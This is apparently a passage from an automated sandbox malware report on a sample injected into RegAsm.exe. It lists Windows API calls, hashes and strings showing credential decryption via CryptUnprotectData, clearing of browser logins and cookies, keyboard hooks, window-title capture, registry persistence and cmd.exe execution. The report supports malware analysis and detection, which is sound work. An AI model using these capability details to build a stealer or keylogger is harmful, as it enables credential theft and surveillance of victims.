                            • LoadLibraryA.KERNEL32(crypt32), ref: 00406ABD
                            • GetProcAddress.KERNEL32(00000000), ref: 00406AC4
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: AddressLibraryLoadProc
                            • String ID: CryptUnprotectData$crypt32
                            • API String ID: 2574300362-2380590389
                            • Opcode ID: 905686a6130e311fdcec2a0cd22c75bab7e39712089f0cc697143e337071fc99
                            • Instruction ID: 59ed3cbb63f31e38ea488d6bd85f24bb9ff1ce5495ed4d1509158228521d53cd
                            • Opcode Fuzzy Hash: 905686a6130e311fdcec2a0cd22c75bab7e39712089f0cc697143e337071fc99
                            • Instruction Fuzzy Hash: 2C01B975604216BBCB18CFAD9D449AF7BB4AB45300B00417EE956E3381DA74E9008B95
                            APIs
                            • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00405159), ref: 00405173
                            • CloseHandle.KERNEL32(?), ref: 004051CA
                            • SetEvent.KERNEL32(?), ref: 004051D9
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: CloseEventHandleObjectSingleWait
                            • String ID: Connection Timeout
                            • API String ID: 2055531096-499159329
                            • Opcode ID: 9f6ecd509c0a7bd309a8898773f2a48374a0d847cbc707063012ebd492618a2f
                            • Instruction ID: b176daa04f7f78a72cd0d213bf0bcd41e0e3849ccec9e2477ca34bbc74fb9340
                            • Opcode Fuzzy Hash: 9f6ecd509c0a7bd309a8898773f2a48374a0d847cbc707063012ebd492618a2f
                            • Instruction Fuzzy Hash: C901F530940F00AFD7216B368D8642BBFE0EF00306704093EE68356AE2D6789800CF89
                            APIs
                            • __CxxThrowException@8.LIBVCRUNTIME ref: 0040E86E
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: Exception@8Throw
                            • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                            • API String ID: 2005118841-1866435925
                            • Opcode ID: 393980db8800f491ea7c1a59f80fc085f11d752c19bfb05bf36f8e27219a3784
                            • Instruction ID: 287a1f786264602a2f100ba68ee8cd07dacd1bfc9ef62352ff5e55a88b78f620
                            • Opcode Fuzzy Hash: 393980db8800f491ea7c1a59f80fc085f11d752c19bfb05bf36f8e27219a3784
                            • Instruction Fuzzy Hash: 59018F626583087AEB14B697CC03FBA33685B10708F10CC3BBD01765C2EA7D6A61C66F
                            APIs
                            • RegCreateKeyW.ADVAPI32(80000001,00000000,?), ref: 0041385A
                            • RegSetValueExW.ADVAPI32 ref: 00413888
                            • RegCloseKey.ADVAPI32(?), ref: 00413893
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: CloseCreateValue
                            • String ID: pth_unenc
                            • API String ID: 1818849710-4028850238
                            • Opcode ID: 5c236e770f027b7b6dfc699725bd7ba66defa52264e3e321846078cfa9e8a7ba
                            • Instruction ID: 9133f253890910ff78e8f434c24b82038cc7026402723a24ca4ec17c3e6d8cb5
                            • Opcode Fuzzy Hash: 5c236e770f027b7b6dfc699725bd7ba66defa52264e3e321846078cfa9e8a7ba
                            • Instruction Fuzzy Hash: 15F0C271440218FBCF00AFA1EC45FEE376CEF00756F10452AF905A61A1E7759E04DA94
                            APIs
                            • std::_Lockit::_Lockit.LIBCPMT ref: 0040DFEC
                            • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0040E02B
                              • Part of subcall function 004356CD: _Yarn.LIBCPMT ref: 004356EC
                              • Part of subcall function 004356CD: _Yarn.LIBCPMT ref: 00435710
                            • __CxxThrowException@8.LIBVCRUNTIME ref: 0040E051
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: Yarnstd::_$Exception@8Locinfo::_Locinfo_ctorLockitLockit::_Throw
                            • String ID: bad locale name
                            • API String ID: 3628047217-1405518554
                            • Opcode ID: 358b3f1522e08b03a3202c9f95d61a93da44700bf44d5321e5e8d61ced44f7e6
                            • Instruction ID: 7f9ccd90240ef42149755af47b5df127ed13e8783c268b42739d505c0e35a915
                            • Opcode Fuzzy Hash: 358b3f1522e08b03a3202c9f95d61a93da44700bf44d5321e5e8d61ced44f7e6
                            • Instruction Fuzzy Hash: 77F08131544A085AC338FA62D863DDA73B49F14358F50457FB406268D2EF78BA0CCA9D
                            APIs
                            • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,10004AEA,?,?,10004A8A,?,10012238,0000000C,10004BBD,00000000,00000000), ref: 10004B59
                            • FreeLibrary.KERNEL32(00000000,?,?,?,10004AEA,?,?,10004A8A,?,10012238,0000000C,10004BBD,00000000,00000000,00000001,10002082), ref: 10004B8F
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.875960236.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                            • Associated: 00000008.00000002.875951516.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                            • Associated: 00000008.00000002.875960236.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_10000000_RegAsm.jbxd
                            Similarity
                            • API ID: FreeHandleLibraryModule
                            • String ID: CorExitProcess$mscoree.dll
                            • API String ID: 662261464-1276376045
                            • Opcode ID: 497ca4813dea5db040ed96ba3988917c23aad912c76c67efd82f8c60daebc881
                            • Instruction ID: e6e2f78cdd7cd30bdf2d4d174718ae12991e9b6ae5ca6a82eaba56a43cf4d13d
                            • Opcode Fuzzy Hash: 497ca4813dea5db040ed96ba3988917c23aad912c76c67efd82f8c60daebc881
                            • Instruction Fuzzy Hash: C8F03C71900218BBEB11AB94CC48BAEBFB9EF043D1F01416AE909A6164DF309941CAA5
                            APIs
                              • Part of subcall function 10007153: GetEnvironmentStringsW.KERNEL32 ref: 1000715C
                              • Part of subcall function 10007153: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 1000717F
                              • Part of subcall function 10007153: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 100071A5
                              • Part of subcall function 10007153: _free.LIBCMT ref: 100071B8
                              • Part of subcall function 10007153: FreeEnvironmentStringsW.KERNEL32(00000000), ref: 100071C7
                            • _free.LIBCMT ref: 10004F1D
                            • _free.LIBCMT ref: 10004F24
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.875960236.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                            • Associated: 00000008.00000002.875951516.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                            • Associated: 00000008.00000002.875960236.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_10000000_RegAsm.jbxd
                            Similarity
                            • API ID: _free$ByteCharEnvironmentMultiStringsWide$Free
                            • String ID: 8 V$8 V
                            • API String ID: 400815659-2763740980
                            • Opcode ID: e0fe51c550968720479aec1141248534f2a92988cecb2e3b51196d93947e3756
                            • Instruction ID: eaf7f0aa003ddc14549942adb29436a4b3c466950eec5de4e21d931d64d8bd94
                            • Opcode Fuzzy Hash: e0fe51c550968720479aec1141248534f2a92988cecb2e3b51196d93947e3756
                            • Instruction Fuzzy Hash: 7BE0E5A6A0D99291F261D23D7D4265E1B45CBC12F5B230226FC249B1CBDDA4D801109D
                            APIs
                            • CreateThread.KERNEL32(00000000,00000000,Function_0001D4EE,00000000,00000000,00000000), ref: 00416C82
                            • ShowWindow.USER32(00000009), ref: 00416C9C
                            • SetForegroundWindow.USER32 ref: 00416CA8
                              • Part of subcall function 0041CE2C: AllocConsole.KERNEL32 ref: 0041CE35
                              • Part of subcall function 0041CE2C: GetConsoleWindow.KERNEL32 ref: 0041CE3B
                              • Part of subcall function 0041CE2C: ShowWindow.USER32(00000000,00000000), ref: 0041CE4E
                              • Part of subcall function 0041CE2C: SetConsoleOutputCP.KERNEL32(000004E4), ref: 0041CE73
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: Window$Console$Show$AllocCreateForegroundOutputThread
                            • String ID: !D@
                            • API String ID: 186401046-604454484
                            • Opcode ID: 66a4db702971166e51169c96c42166a39a03490b62fdad1c1d9be1af324f9392
                            • Instruction ID: 9f5213224becab59645eda34593d96b16d6ada18beeab21aaf628210512d7754
                            • Opcode Fuzzy Hash: 66a4db702971166e51169c96c42166a39a03490b62fdad1c1d9be1af324f9392
                            • Instruction Fuzzy Hash: ECF05E70149340EAD720AB62ED45AFA7B69EB54341F01487BF909C20F2DB389C94865E
                            APIs
                            • ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 0041616B
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: ExecuteShell
                            • String ID: /C $cmd.exe$open
                            • API String ID: 587946157-3896048727
                            • Opcode ID: 6b954565fb865431a8f0571ad86dfb8a094b841cbf93f4f8f4d3cab274959172
                            • Instruction ID: 08f4dee505367bf09000beb2be63de5ecd082ae46aa0e0363999309db21c3e05
                            • Opcode Fuzzy Hash: 6b954565fb865431a8f0571ad86dfb8a094b841cbf93f4f8f4d3cab274959172
                            • Instruction Fuzzy Hash: 5EE0C0B0204305ABC605F675DC96CBF73ADAA94749B50483F7142A20E2EF7C9D49C65D
                            APIs
                            • TerminateThread.KERNEL32(0040A2B8,00000000,004752F0,pth_unenc,0040D0F3,`.S,004752F0,?,pth_unenc), ref: 0040B8F6
                            • UnhookWindowsHookEx.USER32 ref: 0040B902
                            • TerminateThread.KERNEL32(0040A2A2,00000000,?,pth_unenc), ref: 0040B910
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: TerminateThread$HookUnhookWindows
                            • String ID: pth_unenc
                            • API String ID: 3123878439-4028850238
                            • Opcode ID: e1cbc6e2d6c434028aa849536a2aaf0ad10149223ccd3897ab004e8dbc05b34a
                            • Instruction ID: 372ac16de24f92ae7b862ff59389ff52a9cc8b3ac2037ffe6dc6d1e564519698
                            • Opcode Fuzzy Hash: e1cbc6e2d6c434028aa849536a2aaf0ad10149223ccd3897ab004e8dbc05b34a
                            • Instruction Fuzzy Hash: 71E01272204315EFD7201F909C888667AADEE1539632409BEF6C261BB6CB7D4C54C79D
                            APIs
                            • GetModuleHandleA.KERNEL32(User32.dll,GetCursorInfo), ref: 00401414
                            • GetProcAddress.KERNEL32(00000000), ref: 0040141B
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: AddressHandleModuleProc
                            • String ID: GetCursorInfo$User32.dll
                            • API String ID: 1646373207-2714051624
                            • Opcode ID: d896883a00b7c9d91a41f0e937368129b1e8cf7bb1ae53218dcc7360cef0261f
                            • Instruction ID: 8b26e8b19aea132afe7ec2793fcae50f4a2deac5c44528798ee909e27cd98dc2
                            • Opcode Fuzzy Hash: d896883a00b7c9d91a41f0e937368129b1e8cf7bb1ae53218dcc7360cef0261f
                            • Instruction Fuzzy Hash: 6BB092B4981740FB8F102BB0AE4EA193A25B614703B1008B6F046961A2EBB888009A2E
                            APIs
                            • LoadLibraryA.KERNEL32(User32.dll), ref: 004014B9
                            • GetProcAddress.KERNEL32(00000000), ref: 004014C0
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: AddressLibraryLoadProc
                            • String ID: GetLastInputInfo$User32.dll
                            • API String ID: 2574300362-1519888992
                            • Opcode ID: 97ca63f656fbe05ba3a699769711b358361c41ed64750357eec187df6322536e
                            • Instruction ID: d02e03e3b89f99dad65f23c179d95e13f318a7fd709defe56253aab8848571e2
                            • Opcode Fuzzy Hash: 97ca63f656fbe05ba3a699769711b358361c41ed64750357eec187df6322536e
                            • Instruction Fuzzy Hash: EFB092B8580300FBCB102FA0AD4E91E3A68AA18703B1008A7F441C21A1EBB888009F5F
                            APIs
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: __alldvrm$_strrchr
                            • String ID:
                            • API String ID: 1036877536-0
                            • Opcode ID: 70c324bd787235ec34b4410bef6e6c487e79153caf11c4279a27308c3ab035ac
                            • Instruction ID: 8ce1af842cd152cb2b2428f5d584a25f6c9224aafe101b92c03b71ca88d34985
                            • Opcode Fuzzy Hash: 70c324bd787235ec34b4410bef6e6c487e79153caf11c4279a27308c3ab035ac
                            • Instruction Fuzzy Hash: 87A156729846829FF721CF58C8817AEBBA5FF15314F2841AFE8859B381D27C8C51C75A
                            APIs
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: _free
                            • String ID:
                            • API String ID: 269201875-0
                            • Opcode ID: 5a84445a6d60efe319971740dde2d2f541f568e0726df331b0a843d8179482b0
                            • Instruction ID: 6f8591e81a910498abf0b0e408487d1c0faf04506bf4bd3dd9e850377c22d226
                            • Opcode Fuzzy Hash: 5a84445a6d60efe319971740dde2d2f541f568e0726df331b0a843d8179482b0
                            • Instruction Fuzzy Hash: 34413931B00104AAEB207B7A9C4666F3AB5DF45735F570A1FFD28C7293DA7C481D426A
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 423e02715d989b220add50ecbde53982322c6e48bca96a6cd7fe69295545b5c8
                            • Instruction ID: b0a34e1ed6630e1fb57c9e62860a3601010315cd62f19612bff23542d182db60
                            • Opcode Fuzzy Hash: 423e02715d989b220add50ecbde53982322c6e48bca96a6cd7fe69295545b5c8
                            • Instruction Fuzzy Hash: 70412AB1600704BFE724AF79CD41B5EBBE8EB88714F10462FF145DB281E3B999058798
                            APIs
                            • MultiByteToWideChar.KERNEL32(00000000,00000000,00000100,00000020,00000000,00000000,5EFC4D8B,00000100,10006FFD,00000000,00000001,00000020,00000100,?,5EFC4D8B,00000000), ref: 10008731
                            • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 100087BA
                            • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 100087CC
                            • __freea.LIBCMT ref: 100087D5
                              • Part of subcall function 100056D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 10005702
                            Memory Dump Source
                            • Source File: 00000008.00000002.875960236.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                            • Associated: 00000008.00000002.875951516.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                            • Associated: 00000008.00000002.875960236.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_10000000_RegAsm.jbxd
                            Similarity
                            • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                            • String ID:
                            • API String ID: 2652629310-0
                            • Opcode ID: 11ee239c82756698d200c57d0e0d3564a08309f574ce1b92975b0cd3435ea26e
                            • Instruction ID: 5b9b35b0a4db414dac5c81271493033b4f2f0f3dd9b893eeefd60fa04c8ec889
                            • Opcode Fuzzy Hash: 11ee239c82756698d200c57d0e0d3564a08309f574ce1b92975b0cd3435ea26e
                            • Instruction Fuzzy Hash: 2731AE32A0021AABEF15CF64CC85EAF7BA5EF44290F214129FC48D7158EB35DE50CBA0
                            APIs
                            Strings
                            • Cleared browsers logins and cookies., xrefs: 0040C130
                            • [Cleared browsers logins and cookies.], xrefs: 0040C11F
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: Sleep
                            • String ID: [Cleared browsers logins and cookies.]$Cleared browsers logins and cookies.
                            • API String ID: 3472027048-1236744412
                            • Opcode ID: af2c2d963010d4b9fe0ed32b7540b86f028afa125e63126aea6004068ef018c7
                            • Instruction ID: 5a72b8a34604a64e244bad04561a930bad76f77e78bf22f3e088d6afb7384554
                            • Opcode Fuzzy Hash: af2c2d963010d4b9fe0ed32b7540b86f028afa125e63126aea6004068ef018c7
                            • Instruction Fuzzy Hash: A431A805648381EDD6116BF514967AB7B824A53748F0882BFB8C4373C3DA7A4808C79F
                            APIs
                            • EnumDisplayMonitors.USER32(00000000,00000000,0041960A,00000000), ref: 00419530
                            • EnumDisplayDevicesW.USER32(?), ref: 00419560
                            • EnumDisplayDevicesW.USER32(?,?,?,00000000), ref: 004195D5
                            • EnumDisplayDevicesW.USER32(00000000,00000000,?,00000000), ref: 004195F2
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: DisplayEnum$Devices$Monitors
                            • String ID:
                            • API String ID: 1432082543-0
                            • Opcode ID: 307544a1efd678830df2dab17394228d9bd71c3d3133ae3f2bbfdbf915fafe35
                            • Instruction ID: 2d7c1ce958f8de7f9ce17d43b909e87ea7509c435c2805f0bc90a8abde121c81
                            • Opcode Fuzzy Hash: 307544a1efd678830df2dab17394228d9bd71c3d3133ae3f2bbfdbf915fafe35
                            • Instruction Fuzzy Hash: 232180721083146BD221DF26DC89EABBBECEBD1754F00053FF45AD3190EB749A49C66A
                            APIs
                              • Part of subcall function 00413733: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000), ref: 0041374F
                              • Part of subcall function 00413733: RegQueryValueExA.KERNEL32 ref: 00413768
                              • Part of subcall function 00413733: RegCloseKey.KERNEL32(00000000), ref: 00413773
                            • Sleep.KERNEL32(00000BB8), ref: 004127B5
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: CloseOpenQuerySleepValue
                            • String ID: 8SG$`.S$exepath
                            • API String ID: 4119054056-650117895
                            • Opcode ID: 2623c7753db8338a8ecc8f8a9aff935ef8b7f52fc7af967014f204662f36537b
                            • Instruction ID: 51bf296395b05d3efeb7b41814c334b1d8e13e95dfba71b8de44539041ec8c28
                            • Opcode Fuzzy Hash: 2623c7753db8338a8ecc8f8a9aff935ef8b7f52fc7af967014f204662f36537b
                            • Instruction Fuzzy Hash: 3521F4A1B003042BD604B6365D4AAAF724D8B80318F40897FBA56E72D3DFBC9D45826D
                            APIs
                            • GetFileSize.KERNEL32(00000000,00000000,?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D58
                            • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 10001D72
                            • CloseHandle.KERNEL32(00000000), ref: 10001D7D
                            Memory Dump Source
                            • Source File: 00000008.00000002.875960236.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                            • Associated: 00000008.00000002.875951516.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                            • Associated: 00000008.00000002.875960236.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_10000000_RegAsm.jbxd
                            Similarity
                            • API ID: File$CloseHandleReadSize
                            • String ID:
                            • API String ID: 3642004256-0
                            • Opcode ID: 95ffba8e0906de61fbf41533eef9bce15325b0b0370a179d90a4a5ca68fedbfa
                            • Instruction ID: 3114db45d92e83daf92c47a85baf70c14dd0292bf94a6379629bf72341f68b19
                            • Opcode Fuzzy Hash: 95ffba8e0906de61fbf41533eef9bce15325b0b0370a179d90a4a5ca68fedbfa
                            • Instruction Fuzzy Hash: 2221FCB594122CAFF710EBA08CCCFEF76ACEB08395F010566F515D2154D6709E458A70
                            APIs
                              • Part of subcall function 0041C5E2: GetForegroundWindow.USER32 ref: 0041C5F2
                              • Part of subcall function 0041C5E2: GetWindowTextLengthW.USER32 ref: 0041C5FB
                              • Part of subcall function 0041C5E2: GetWindowTextW.USER32 ref: 0041C625
                            • Sleep.KERNEL32(000001F4), ref: 0040A5AE
                            • Sleep.KERNEL32(00000064), ref: 0040A638
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: Window$SleepText$ForegroundLength
                            • String ID: [ $ ]
                            • API String ID: 3309952895-93608704
                            • Opcode ID: e3c1de537be80067876ef70e6a789dfde08fa912f151d6d6ce86b7d0ea258fd3
                            • Instruction ID: 6255842b65d5da3793f092b3f1447ea5db7efb23f61c0c2d19f8aa6a86066f85
                            • Opcode Fuzzy Hash: e3c1de537be80067876ef70e6a789dfde08fa912f151d6d6ce86b7d0ea258fd3
                            • Instruction Fuzzy Hash: CB119F315143006BC614BB26CC579AF77A8AB90348F40083FF552661E3EF79AE18869B
                            APIs
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: SystemTimes$Sleep__aulldiv
                            • String ID:
                            • API String ID: 188215759-0
                            • Opcode ID: 32d4930cb2be9b30136c829dd369e4a23351f3455ccfda4be26c85d87a7cef4d
                            • Instruction ID: 634937a4cd8d43e921f59083ecd148feda9109121ee8127270144c35be039893
                            • Opcode Fuzzy Hash: 32d4930cb2be9b30136c829dd369e4a23351f3455ccfda4be26c85d87a7cef4d
                            • Instruction Fuzzy Hash: D01133B35043456BC304EAB5CD85DEF779CEBC4358F040A3EF64982061EE29E94986A6
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            APIs
                            • ___BuildCatchObject.LIBVCRUNTIME ref: 004398FA
                              • Part of subcall function 00439F32: ___AdjustPointer.LIBCMT ref: 00439F7C
                            • _UnwindNestedFrames.LIBCMT ref: 00439911
                            • ___FrameUnwindToState.LIBVCRUNTIME ref: 00439923
                            • CallCatchBlock.LIBVCRUNTIME ref: 00439947
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
